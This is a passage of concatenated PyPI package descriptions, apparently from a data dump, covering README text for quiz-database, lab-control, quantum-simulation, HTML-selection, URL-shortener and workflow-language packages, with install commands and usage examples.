asquiz1,assignment2, andfinal. It\ncan be any arbitrary string identifying a type of assessment. Anassessmentis a specific occurrence of anassessment typein a\ngiventerm, and hence is identified by a pair of atermand anassessment type.Example queries:In which assessments has a given question been used?What questions make up a given assessment?What questions have been used in a given term?What questions have been used in final exams across all terms?Use a template to render an assessment document using its questions.Distinguish between essay questions (default) and multiple-choice\nquestions.Use arbitrary additional variables in your templates, so you can use\nthe same templates across courses by introducing, for example, an\nadditionalcourse namevariable.Getting StartedCreate a database:qm initBy default, this command creates a./qu.dbdatabase file. Use the-D(or--database) option to specify the database file\nlocation.Add questions to assessments (an assessment is identified by atermand anassessment type):qm add --term 151 --assessment-type quiz1 questions/chapter1/whats-your-name.tex\nqm add --term 151 --assessment-type quiz1 questions/chapter1/mcq/choose-a-month.texUse the-Q(or--questions-directory) option to specify where\nto look for the question files. You can also specify a question\u2019spoints(-p), whether it\u2019s abonusquestion (-b), and itsorderin the assessment (-o) if you want to insert it somewhere\nin the middle. Thepoints,bonus, andorderfields of a\nquestion are per assessment, and can change from one assessment to\nanother.Generate an assessment:qm render --term 151 --assessment-type quiz1 --pdflatex quiz-template.texThe--pdflatexoption (or-P) assumes that your template is a\nLaTeX file, requires thepdflatexprogram, and generates a PDF.\nWithout it, you get a rendered template.The--configoption (or-C) allows specifying additional\narbitrary template variables using anINI-style configuration\nfile.CommandsAlthough theinit,add, andrendercommands described above\nare often enough, there are a few other commands that complement them.\nMoreover, these three commands have a few options that control their\noperation. Here are all the supported commands and their options.initusage: qm init [-h] [-D DATABASE]\n\nCreate a new database file as specified by the -D option. Defaults to ./qu.db.\nIf the database exists, do nothing\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file pathlistusage: qm list [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] [-t TERM]\n [-y ASSESSMENT_TYPE] [-q QUESTION] [-m]\n {terms,assessment-types,assessments,questions}\n\nList existing entities: terms, assessment-types, assessments, or questions\n\npositional arguments:\n {terms,assessment-types,assessments,questions}\n what to list\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester code, e.g. 142\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -q QUESTION, --question QUESTION\n include results related to this question only\n -m, --mcq whether to retrieve MCQs or non-MCQs. cannot retrieve\n both at onceaddusage: qm add [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE [-b] [-p POINTS] [-o ORDER] [-d DATE]\n question\n\nAdd a question file to a given assessment, specified by a term and an\nassessment-type (required options)\n\npositional arguments:\n question path to the question file\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -b, --bonus this is a bonus question\n -p POINTS, --points POINTS\n default points for question\n -o ORDER, --order ORDER\n the order of the question in this assessment; defaults\n to last\n -d DATE, --date DATE assessment date; format YYYY-MM-DDupdateusage: qm update [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE [-b] [-p POINTS] [-o ORDER] [-d DATE]\n question\n\nUpdate an existing assessment or question\n\npositional arguments:\n question path to the question file\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -b, --bonus this is a bonus question\n -p POINTS, --points POINTS\n default points for question\n -o ORDER, --order ORDER\n the order of the question in this assessment; defaults\n to last\n -d DATE, --date DATE assessment date; format YYYY-MM-DDremove(orrm)usage: qm remove [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE\n\nRemove a question from an assessment\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3renderusage: qm render [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE [-O OUTPUT_DIRECTORY] [-C CONFIG] [-P]\n [-l MATERIAL]\n template\n\nGenerate assessment documents using the specified template. Two documents are\ngenerated: TERM-ASSESSMENT_TYPE.tex and TERM-ASSESSMENT_TYPE-solution.tex,\nwith the template variable \"solution\" set to False and True, respectively.\nTemplates are rendered using the Jinja2 template engine, with the following\ndelimiters: <% block %><% endblock %>, << variable >>, <# comment #>\n\npositional arguments:\n template path to the jinja2 template file\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -O OUTPUT_DIRECTORY, --output-directory OUTPUT_DIRECTORY\n the directory in which the rendered files will be\n saved\n -C CONFIG, --config CONFIG\n ini-style configuration file defining additional\n template variables. (Use section [templates])\n -P, --pdflatex process rendered file with pdflatex (4 runs)\n -l MATERIAL, --material MATERIAL\n specify the material to which this assessment\n pertains. Available to the template in the \"material\"\n variableexportusage: qm export [-h] [-D DATABASE] [--overwrite] file\n\nExport the database to a YAML file (does not include the contents of question\nfiles)\n\npositional arguments:\n file YAML file to export to\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n --overwrite overwrite the file if it already existsimportusage: qm import [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] [-u] file\n\nImport data from a YAML file into the database. To learn the YAML schema,\nexport a minimal database, or see the README.md file\n\npositional arguments:\n file YAML file to import\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -u, --update ignore existing, identical questionsExample valid YAML data:'142':# term codequiz1:# assessment type: creates an assessment in the parent term-file:questions/chapter1/q1.tex# each item in the list is a question-file:questions/chapter2/q5.tex# file: the file containing the question textdate:2015-02-14# a date in any question sets the assessment date-bonus:true# set this question as a bonus questionfile:questions/chapter2/arm-gcc.texpoints:20# how many points are assigned to this question in this assessmentquiz2:# another assessment in the same term-date:2015-03-07file:questions/chapter3/q2.tex-file:questions/chapter3/q3.texpoints:20'151':# another termquiz1:# this is a different assessment from the previous quiz1,# because it belongs to a different term-file:questions/chapter6/q3.texTemplatesTemplates use theJinja2template\nlanguage. Therendercommand requires the--termand--assessment-typeoptions to specify anassessment. The following\nassessment variables are available in the template:term: the term of the specified assessment.title: assessment title, based on its type. For example,quiz1results in the titleQuiz 1, andmajor1results in the titleMajor Exam 1.date: assessment date, as specified using the--dateoption\nof theaddandupdatecommands.solution(Boolean): whether we are rendering the solution.qs: an ordered list of question objects belonging to this\nassessment. Includes the following fields:question.file: path of the question file.points: question points.bonus(Boolean): whether this is a bonus question.mcqs: an ordered list of multiple-choice question objects,\notherwise similar toqs.questions_relpath: the relative path from the current directory\nto the questions as specified by the-Q/--questions-directoryoption.Variables can be referenced in the template by enclosing them in<>. For example,<< title >>renders the assessment\u2019stitle.To use some basic logic in the template, use template statements, such\nasforloops orifconditionals, by enclosing them in<%and%>. For example:<% for q in qs %>\n <% if q.bonus %>\n \\bonusquestion\n <% else %>\n \\question\n <% endif %>\n <% if q.points %>[<< q.points >>]<% endif %>\n \\input{<< questions_relpath >>/<< q.question.file >>}\n<% endfor %>For information about the template language, consult theJinja2\nTemplate Designer\nDocumentation.AssumptionsOneSQLitedatabase file per course.Questions and templates are text files.Multiple choice questions have an/mcq/component in their paths.Each question file includes the question\u2019s solution in a way that\nallows it to be easily listed or omitted in a template.Although it is not required,qudbworks well with theexamLaTeX package. For example,\neach question file can wrap the solution in asolutionenvironment, then the template can easily include or exclude the\nsolution based on the value of thesolutiontemplate variable as\nfollows:<% if solution %>\n\\printanswers\n<% endif %>LicenseBSD (2-clause)."} +{"package": "qudi-core", "pacakge-description": "qudi-coreThe qudi-core repository represents the base installation for thequdiPython package.It provides a versatile framework for modular multi-instrument and multi-computer measurement\napplications.\nIt enables scientists and engineers to easily develop specialized multithreaded graphical or\nnon-graphical applications.Most of the more technical details about a complex measurement suite are handled automatically byqudiso the developer can focus on what matters most... the measurement control logic and the\noptional graphical user interface.An incomplete list of functionalityqudiprovides:loggingthread managementautomatic app status dumping/loadingruntime resource managementbase modules for hardware interfaces, measurement logics and graphical user interfacesinter-module communicationsupport for installablequdinamespace package addonsinteractive local IPython kernel interfacehigh-level automation framework via tasks/scriptsmeasurement setup configuration via YAML config filevarious tooling as a Python librarybasic data storage facility...AttributionIf you are publishing any work based on using qudi as a framework/tool it is good practice to\nmention the qudi project, e.g. in the methods description.Even better, you could simply cite our initial publication about qudi:Qudi: A modular python suite for experiment control and data processingThe qudi contributors will appreciate this and it helps our open-source community to gain attention.\nThis will hopefully attract more people willing to help in improving the qudi project which in turn\nbenefits everyone using this software.Thank you!InstallationFor installation instructions please refer to ourqudi installation guide.DocumentationThe official qudi documentation homepage can be foundhere.ForumFor questions concerning qudi on any level, there is aforumto discuss with the qudi community. Feel free to ask!\nIf you found a bug and located it already, please note GitHub'sissue trackingfeature.ContributingYou want to contribute to the qudi project? Great! Please start by reading through ourcontributing guideline.To file a bug report or feature request please open anissue on GitHub.To contribute source code to the qudi-core repository please open apull request on GitHub.Issuesandpull requestsshould be discussed openly in their\nrespective comment sections on GitHub.For any other development-related questions or discussions please subscribe to and use ourqudi-dev mailing list. Please also consider usinggiststo showcase and discuss topics publicly within the qudi community.News and UpdatesWe will occasionally inform the qudi community about releases and breaking changes (no discussions).If you are using qudi and want to stay in the loop, please subscribe to ourqudi-announce mailing list.LicenseQudi is licensed under theGNU Lesser General Public License Version 3 (LGPL v3).A copy of the full license text can be found in the repository root directory inLICENSEandLICENSE.LESSERFor more information please check thelicense section in the qudi documentation.CopyrightCheckAUTHORS.mdfor a list of authors and the git history for their individual\ncontributions."} +{"package": "qudida", "pacakge-description": "QuDiDA (QUick and DIrty Domain Adaptation)QuDiDA is a micro library for very naive though quick pixel level image domain adaptation viascikit-learntransformers.\nIs assumed to be used as image augmentation technique, while was not tested in public benchmarks.Installationpip install qudidaorpip install git+https://github.com/arsenyinfo/qudidaUsageimport cv2\n\nfrom sklearn.decomposition import PCA\nfrom qudida import DomainAdapter\n\nadapter = DomainAdapter(transformer=PCA(n_components=1), ref_img=cv2.imread('target.png'))\nsource = cv2.imread('source.png')\nresult = adapter(source)\ncv2.imwrite('../result.png', result)ExampleSource image:Target image (style donor):Result with various adaptations:"} +{"package": "qudi-hira-analysis", "pacakge-description": "Qudi Hira AnalysisAnalytics suite for qubit SPM using FPGA timetaggersInstallationpipinstallqudi-hira-analysisUpdate to latest versionpipinstall--upgradequdi-hira-analysisCitationIf you are publishing scientific results that use this code, as good scientific practice you\nshould citethis work.FeaturesAutomated data import and handlingWorks natively with data fromQudiandQudi-HiraFast and robust curve fitting for NV-ODMR 2D maps, Autocorrelation, Rabi, Ramsey, T1, T2 and more...Supports all file formats used in NV magnetometry, AFM, MFM and NV-SPMUses a Dataclass-centered design for easy access to data and metadataUsagefrompathlibimportPathimportseabornassnsfromqudi_hira_analysisimportDataHandlerdh=DataHandler(data_folder=Path(\"C:/Data\"),# Path to data folderfigure_folder=Path(\"C:/QudiHiraAnalysis\"),# Path to figure foldermeasurement_folder=Path(\"20230101_NV1\")# Measurement folder name (optional))# Lazy-load all pulsed measurements with \"odmr\" in the path into a Dataclassodmr_measurements=dh.load_measurements(\"odmr\",pulsed=True)# Fit ODMR data with a double Lorentzianodmr=odmr_measurements[\"20230101-0420-00\"]x_fit,y_fit,result=dh.fit(x=\"Controlled variable(Hz)\",y=\"Signal\",fit_function=dh.fit_function.lorentziandouble,data=odmr.data)# Plot the data and the fitax=sns.scatterplot(x=\"Controlled variable(Hz)\",y=\"Signal\",data=odmr.data,label=\"Data\")sns.lineplot(x=x_fit,y=y_fit,ax=ax,label=\"Fit\")# Calculate the ODMR splittingax.axvline(result.best_values[\"l0_center\"],ls=\"--\",color=\"C1\")ax.axvline(result.best_values[\"l1_center\"],ls=\"--\",color=\"C1\")splitting=result.best_values[\"l1_center\"]-result.best_values[\"l0_center\"]ax.set_title(f\"ODMR splitting ={splitting/1e6:.1f}MHz\")# Generate fit reportprint(result.fit_report())# Save figuredh.save_figures(filepath=Path(\"odmr_fit\"),fig=ax.get_figure())DocumentationThe full documentation is availablehere.SchemaOverallflowchart TD\n IOHandler <-- Handle IO operations --> DataLoader;\n DataLoader <-- Map IO callables --> DataHandler;\n Qudi[Qudi FitLogic] --> AnalysisLogic;\n AnalysisLogic -- Inject fit functions --> DataHandler;\n DataHandler -- Fit data --> Plot;\n DataHandler -- Structure data --> MeasurementDataclass;\n MeasurementDataclass -- Plot data --> Plot[JupyterLab Notebook];\n Plot -- Save plotted data --> DataHandler;\n style MeasurementDataclass fill: #bbf, stroke: #f66, stroke-width: 2px, color: #fff, stroke-dasharray: 5 5Dataclassflowchart LR\n subgraph Standard Data\n MeasurementDataclass --o filepath1[filepath: Path];\n MeasurementDataclass --o data1[data: DataFrame];\n MeasurementDataclass --o params1[params: dict];\n MeasurementDataclass --o timestamp1[timestamp: datetime.datetime];\n MeasurementDataclass --o methods1[get_param_from_filename: Callable];\n MeasurementDataclass --o methods2[set_datetime_index: Callable];\n end\n subgraph Pulsed Data\n MeasurementDataclass -- pulsed --> PulsedMeasurementDataclass;\n PulsedMeasurementDataclass -- measurement --> PulsedMeasurement;\n PulsedMeasurement --o filepath2[filepath: Path];\n PulsedMeasurement --o data2[data: DataFrame];\n PulsedMeasurement --o params2[params: dict];\n PulsedMeasurementDataclass -- laser_pulses --> LaserPulses;\n LaserPulses --o filepath3[filepath: Path];\n LaserPulses --o data3[data: DataFrame];\n LaserPulses --o params3[params: dict];\n PulsedMeasurementDataclass -- timetrace --> RawTimetrace;\n RawTimetrace --o filepath4[filepath: Path];\n RawTimetrace --o data4[data: DataFrame];\n RawTimetrace --o params4[params: dict];\n endLicenseThis license of this project is located in the top level folder underLICENSE. Some specific files contain their\nindividual licenses in the file header docstring.BuildPrerequisitesPoetrygitClone repo, install deps and add environment to Jupytergitclonehttps://github.com/dineshpinto/qudi-hira-analysis.gitcdqudi-hira-analysis\npoetryinstall\npoetryrunpython-mipykernelinstall--user--name=qudi-hira-analysis\npoetryrunjupyterlabMakefileThe Makefile located innotebooks/is configured to generate a variety of outputs:make pdf: Converts all notebooks to PDF (requires LaTeX backend)make html: Converts all notebooks to HTMLmake py: Converts all notebooks to Python (can be useful for VCS)make all: Sequentially runs all the notebooks in folderTo use themakecommand on Windows you can installChocolatey, then\ninstall make withchoco install make"} +{"package": "qudi-iqo-modules", "pacakge-description": "qudi-iqo-modulesA collection of qudi measurement modules originally developed for experiments on color centers in\nsemiconductor materials.InstallationFor installation instructions please refer to ouriqo-modules installation guide.More informationThe best starting point for further researching the qudi documentation is thereadme fileof the qudi-core repo.ForumFor questions concerning qudi or the iqo-modules, there is aforumto discuss with the qudi community. Feel free to ask!\nIf you found a bug and located it already, please note GitHub'sissue trackingfeature.CopyrightCheckAUTHORS.mdfor a list of authors and the git history for their individual\ncontributions."} +{"package": "qudit-sim", "pacakge-description": "qudit-sim: Qudit pulse simulation and effective Hamiltonian analysisY. Iiyamaqudit-simis a tool for extracting effective Hamiltonians / gate unitaries of arbitrary microwave pulses applied to a system of statically coupled d-level quantum oscillators (qudits). Its intended usage is as a base for prototyping new pulse sequences that implement custom quantum gates involving more than two oscillator levels.Most of the heavy-lifting is done byQuTiPthrough its Schrodinger equation solver (sesolve). The main functions of this tool are to prepare the Hamiltonian object passed tosesolvefrom the input parameters, and to interpret the result of the simulation.As the focus of the tool is on prototyping rather than performing an accurate simulation, the tool currently assumes a simple model of the system. In particular, incoherent effects (qudit relaxation, depolarization, etc.) are not considered.InstallationMost recent tagged versions are available in PyPI.pip install qudit-simTo install from source,git clone https://github.com/UTokyo-ICEPP/qudit-sim\ncd qudit-sim\npip install .RequirementsExact versions of the required packages have not been checked, but reasonably recent versions should do.numpyscipyqutiph5pymatplotlibjax: If using the fidelity maximization (default) method for the effective Hamiltonian extractionoptax: If using the fidelity maximization (default) method for the effective Hamiltonian extractionrqutilsDocumentation and examplesThe documentation including the mathematical background of the simulation and effective Hamiltonian extraction is available atRead the Docs.Example analyses using qudit-sim are available as notebooks in theexamplesdirectory.ContributeYou are most welcome to contribute to qudit-sim development by either forking this repository and sending pull requests or filing bug reports / suggestions for improvement at theissues page."} +{"package": "qudo-quantipy", "pacakge-description": "No description available on PyPI."} +{"package": "qudotpy", "pacakge-description": "QuDotPy=======A quantum computing library written in Python. Exploring quantum computing has never been easier. With QuDotPy you canexperiment with single-qubit operations and gates. You can build multiple-qubit states and perform measurements, and finally you can emulate quantum circuits.To help you get started we have written a detailed usage tutorial that covers most aspects of QuDotPy. The tutorial can be found here: QuDotPy TutorialQuDotPy depends on Numpy. You will need to have Numpy installed before you can use QuDotPy.Getting Started===============QuDotPy depends on Python 3 and is specifically tested against Pythong 3.6.5You can test by running the unit tests in the parent qudotpy directory```python -m unittest qudotpy.test_qudotpy``````$ python>>> from qudotpy import qudot>>> print qudot.apply_gate(qudot.H, qudot.ZERO)(0.707106781187+0j)|0> + (0.707106781187+0j)|1>>>>```That's it! For more check out our tutorial: QuDotPy Tutorial"} +{"package": "qudpy", "pacakge-description": "QuDPy:A simple package for nonlinear spectroscopy with quantum dynamics provided by qutip.See example_calculations for a detailed example."} +{"package": "qudra", "pacakge-description": "qudraQuantum Energy ManagementMotivationLeveraging quantum advantage to distributed grids for energy security and sustainability.Please check out these slides for moreinformation.InstallationOur team's contribution is supposed to go into thequdrafolder. So move therecd qudraConda users, please make sure toconda install pipbefore running any pip installation if you want to installqudrainto your conda environment.qudrais published on PyPI. So, to install, simply run:pipinstallqudraIf you also want to download the dependencies needed to run optional tutorials, please usepip install qudra[dev]orpip install 'qudra[dev]'(forzshusers).To check if the installation was successful, run:>>>importqudraBuilding from sourceTo buildqudrafrom source, pip install using:gitclonehttps://github.com/Q-Energy-2022/qudra.gitcdqudra\npipinstall--upgrade.If you also want to download the dependencies needed to run optional tutorials, please usepip install --upgrade .[dev]orpip install --upgrade '.[dev]'(forzshusers).Installation for DevsIf you intend to contribute to this project, please installqudrain editable mode as follows:gitclonehttps://github.com/Q-Energy-2022/qudra.gitcdqudra\npipinstall-e.[dev]python3 -m venv venv\n. venv/bin/activate\nPlease usepip install -e '.[dev]'if you are azshuser.Building documentation locallySet yourself up to use the[dev]dependencies. Then, from the command line run:mkdocsbuildThen, when you're ready to deploy, run:mkdocsgh-deployAcknowledgementsCore Devs:Asil Qraini,Fouad Afiouni,Gargi Chandrakar,Nurgazy Seidaliev,Sahar Ben Rached,Salem Al Haddad,Sarthak Prasad MallaMentors:Akash Kant,Shantanu JhaThis project was created at the2022 NYUAD Hackathonfor Social Good in the Arab World: Focusing on Quantum Computing (QC)."} +{"package": "qudth", "pacakge-description": "Qudth randomly samples the lines within a large file and calculates statistics\nabout each line. For example, in a 10-gigabyte text file, you might want to know\nhow long a typical line is.Line lengthsIt would be very convenient if line length is what you are interested in, as\nthat is the only thing we implement right now.$ qudth qudth/cli.py -n 5 --bins 8\n\n\u2581 \u2581 \u2582 \u2581 \u2581 \u2581 \u2583 \u2583\n01 52 59\nLengths of 5 lines in qudth/cli.py\n(simple random sample with replacement)Benchmarkingwc-lis equivalent to qudth\u2019s line length estimation,\nbut qudth\u2019s sampling makes it much faster\non large files.big-file.csvis 1 gigabyte in size._:~ t$ time qudth big-file.csv > /dev/null\n\nreal 0m0.287s\nuser 0m0.161s\nsys 0m0.032s\n_:~ t$ time wc -l big-file.csv > /dev/null\n\nreal 0m2.515s\nuser 0m1.475s\nsys 0m0.440sFuture workA more standard thing would perhaps be something that emitted\na random sample to stdout. It could support different sampling\nstrategies perhaps."} +{"package": "que", "pacakge-description": "Slice and dice html on the command line using CSS selectors.Quick startLet\u2019s say you want to grab all the links onhttp://example.com/foo/bar:$ curl http://example.com/foo/bar | que \"a->href\"Let\u2019s say that gave you 3 lines that looked like this:/some/url?val=1\n/some/url2?val=2\n/some/url3?val=3Ugh, that\u2019s not very helpful, so let\u2019s modify our argument a bit:$ curl http://example.com/foo/bar | que \"a->http://example.com{href}\"Now, that will print:http://example.com/some/url?val=1\nhttp://example.com/some/url2?val=2\nhttp://example.com/some/url3?val=3SelectingNot sure how to use CSS Selectors?Beautiful Soup CSS select\ndocsJQuery\u2019s CSS Selector\ndocsThe selector is divided into two parts separated by->, the first\npart is the traditional selector talked about in the above links and the\nsecond part is the attributes you want to print to the screen for each\nmatch:$ css.selector->attribute,selectorThe Selector part usesPython\u2019s string formatting\nsyntaxso\nyou can embed the attributes you want within a larger string.ExamplesFind all the \u201cDownload\u201d links on a page:que has support for the the non-standard:contains css\nselector$ curl http://example.com | que \"a:contains(Download)->href\"Select all the links with attributedatathat starts with \u201cfoo\u201d:$ curl http://example.com | que \"a[data|=foo]->href\"InstallationYou can use pip to install stable:$ pip install queor the latest and greatest (which might be different than what\u2019s onpypi:$ pip install git+https://github.com/jaymon/que#egg=queNotesIf you need a way more fully featured html command line parser, tryhq."} +{"package": "quearcode", "pacakge-description": "Convert strings and small files to QR Codes"} +{"package": "queasars", "pacakge-description": "QUEASARS - Quantum Evolving Ansatz Variational SolverQUEASARS is an open-source, qiskit-based, python package implementing quantum variational eigensolvers which use evolutionary algorithms to find a good ansatz during the optimization process, likeE-VQE,MoG-VQEorQNEAT.Table of contentsInstallationUsageContributingMaintainersCopyright and licensesCopyrightLicenseInstallationUsing PipQUEASARS requires a python3 environment with python >= 3.9 and can be installed using the following pip command:pip install queasarsFrom SourceQUEASARS' development dependencies are managed usingpoetry.\nTo install QUEASARS from source follow these instructions:Clone the QUEASARS repository.Install Python 3.11Install poetry (installation guide).Runpoetry installfrom within QUEASARS' project directory to install its dependencies.UsageContributingContributions to this project are welcome. You may open issues, fix or expand documentation, provide new functionality or create more and better tests. If you have a minor contribution you can open a pull request right away. For any major contribution please open an issue first or discuss with the repository maintainer. Please also note that you need to fill out and sign acontributor license agreementMaintainersThe current Maintainers of QUEASARS areSven Pr\u00fcfer (@svenpruefer)andDaniel Leidreiter (@dleidreiter).Copyright and licenseCopyrightQuantum Evolving Ansatz Variational Solver (QUEASARS)Copyright 2023 DLR - Deutsches Zentrum f\u00fcr Luft- und Raumfahrt e.V.This product was developed at DLR - GSOC (German Space Operations Center at the German Aerospace Center DLR,https://www.dlr.de/).LicenseQUEASARS is licensed under theApache License, Version 2.0."} +{"package": "quebert", "pacakge-description": "UNKNOWN"} +{"package": "quebra-frases", "pacakge-description": "No description available on PyPI."} +{"package": "quecital", "pacakge-description": "No description available on PyPI."} +{"package": "queclinkdoc", "pacakge-description": "Queclinkdoc is a simple, clean, and less-configured theme for theSphinxdocumentation system developed byQueclink Wireless Solutions Co., Ltd.We show the globalTOCtree of the documentation in a drop-down list at the head of the page, and even if you browse to the end of the page, this TOC tree will still be fixed at the head, so you can jump to other pages at any time.We recommend usingGoogle ChromeorFirefoxto read the generated documentation.You can make and installqueclinkdoctheme like this:pysetup.pysdistpy-mpipinstalldist\\queclinkdoc-x.x.tar.gzWhen using therefdirective to jump to the top of the page, for a good experience, please name the label at the top of the page withheadlabel-as a prefix, for example:1 .. _headlabel-page-title:\n2\n3 Page Title\n4 ===========\n5In addition, this theme supports the following custom HTML options:toc_background_colorUsed to specify the background color of the title area at the head of the page, the default is Blue (#2B579A), for example, you can change it to Green like this:html_theme_options = {\n 'toc_background_color': '#008080',\n}zoomout_asizeCan betrueorfalse, default istrue. The font size of the tag whose first character is a capital letter will be reduced to 0.95em when it is true, and will not be reduced when it is false. You can change it to false like this:html_theme_options = {\n 'zoomout_asize': 'false',\n}snapshot.pngis a snapshot of thequeclinkdoctheme.If you have any questions or suggestions, please contact us, thanks in advance."} +{"package": "quecto", "pacakge-description": "quecto-pyQuecto-py is a simple and official wrapper of Quecto, an open-source and self-hostable solution for link shortening.InstallationpipinstallquectoUsageShorten a linkfromquectoimportQuectoclient=Quecto(\"https://s.oriondev.fr\")r=client.shortUrl(\"https://example.com\",\"password\")# password is optionalprint(r)# https://s.oriondev.fr/s/189d28e9b9ae6Unshorten a linkfromquectoimportQuectoclient=Quecto(\"https://s.oriondev.fr\")r=client.unshortUrl(\"https://s.oriondev.fr/s/189d28e9b9ae6\",\"password\")# password is optionalprint(r)# https://example.comCheck if the domain is a valid Quecto instancefromquectoimportQuectoclient=Quecto(\"https://s.oriondev.fr\")r=client.isValidInstance()print(r)# TrueContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.LicenseGPL3"} +{"package": "queen", "pacakge-description": "UNKNOWN"} +{"package": "queen8", "pacakge-description": "UNKNOWN"} +{"package": "queenbee", "pacakge-description": "Queenbee :crown:Queenbee is a workflow language for describing workflows! The workflow Schema\nis inspired byArgo Workflowand\nborrows a number of terms and expressions fromApache AirflowandAnsible.Queenbee populates and validates the workflows but does not run them! For running the\nworkflows seeladybug-tools/queenbee-luigiwhich converts Queenbee workflows to executableLuigipipelines.You can find more workflow samples inhoneybee-radiance-workflowrepository.Installation> pip install queenbeeor if you want to use the CLI> pip install queenbee[cli]DocumentationYou can access the full docs for this package and its CLIhere.You can also access theSchema\nDocumentationand\nOpenAPI documentation for:ObjectRedocOpenAPI JSONPluginredocjsonReciperedocjsonJobredocjsonLocal DevelopmentClone this repo locallygit clone git@github.com:ladybug-tools/queenbeeorgit clone https://github.com/ladybug-tools/queenbeeInstall dependencies:cd queenbeepip install -r dev-requirements.txtpip install -r requirements.txtRun Tests:python -m pytest tests/Generate Documentation:sphinx-apidoc-f-e-d4-o./docs/modules./queenbeesphinx-build-bhtml./docs./docs/_buildPreview Documentation:python -m http.server --directory ./docs/_build/Now you can see the documentation preview athttp://localhost:8000"} +{"package": "queenbee-dsl", "pacakge-description": "queenbee-python-dslA Python Domain Specific Language (DSL) to create Queenbee Plugins and Recipes as Python\nobjects.API docsQueenbee-DSL API docsRequirementsPython >=3.7InstallationClone this repository.Change directory to root folder of the repository.pip install .Quick StartIf you are interested to start writing your own plugins and recipe see theintroduction post.Functionfromdataclassesimportdataclassfromqueenbee_dsl.functionimportFunction,command,Inputs,Outputs@dataclassclassCreateOctreeWithSky(Function):\"\"\"Generate an octree from a Radiance folder and sky!\"\"\"# inputsinclude_aperture=Inputs.str(default='include',description='A value to indicate if the static aperture should be included in ''octree. Valid values are include and exclude. Default is include.',spec={'type':'string','enum':['include','exclude']})black_out=Inputs.str(default='default',description='A value to indicate if the black material should be used. Valid ''values are default and black. Default value is default.',spec={'type':'string','enum':['black','default']})model=Inputs.folder(description='Path to Radiance model folder.',path='model')sky=Inputs.file(description='Path to sky file.',path='sky.sky')@commanddefcreate_octree(self):return'honeybee-radiance octree from-folder model --output scene.oct '\\'--{{self.include_aperture}}-aperture --{{self.black_out}} '\\'--add-before sky.sky'# outputsscene_file=Outputs.file(description='Output octree file.',path='scene.oct')The Queenbee class is accessible fromqueenbeeproperty.\nTryprint(CreateOctreeWithSky().queenbee.yaml())and you should see the full Queenbee\ndefinition:type:Functionannotations:{}inputs:-type:FunctionStringInputannotations:{}name:black-outdescription:A value to indicate if the black material should be used. Valid valuesare default and black. Default value is default.default:defaultalias:[]required:falsespec:type:stringenum:-black-default-type:FunctionStringInputannotations:{}name:include-aperturedescription:A value to indicate if the static aperture should be included in octree.Valid values are include and exclude. Default is include.default:includealias:[]required:falsespec:type:stringenum:-include-exclude-type:FunctionFolderInputannotations:{}name:modeldescription:Path to Radiance model folder.default:nullalias:[]required:truespec:nullpath:model-type:FunctionFileInputannotations:{}name:skydescription:Path to sky file.default:nullalias:[]required:truespec:nullpath:sky.skyextensions:nulloutputs:-type:FunctionFileOutputannotations:{}name:scene-filedescription:Output octree file.path:scene.octname:create-octree-with-skydescription:Generate an octree from a Radiance folder and sky!command:honeybee-radiance octree from-folder model --output scene.oct --{{inputs.include-aperture}}-aperture--{{inputs.black-out}} --add-before sky.skySince the functions are standard Python classes you can also subclass them from one\nanother.PluginTo create a Queenbee plugin use the functions to create a standard Python module. The only\nchange is that you need to provide the information for Queenbee plugin in the__init__.pyfile as dictionary assigned to__queenbee__variable.In the near future we might be able to use Python package's information to collect most\nof these information.Follow the standard way to install a Python package. Once the package is installed you\ncan usequeenbee-dslto load the package or write it to a folder.fromqueenbee_dsl.packageimportload,write# name of the queenbee packagepython_package='pollination_honeybee_radiance'# load this package as Queenbee Pluginplugin=load(python_package)# or write the package as a Queenbee plugin to a folder 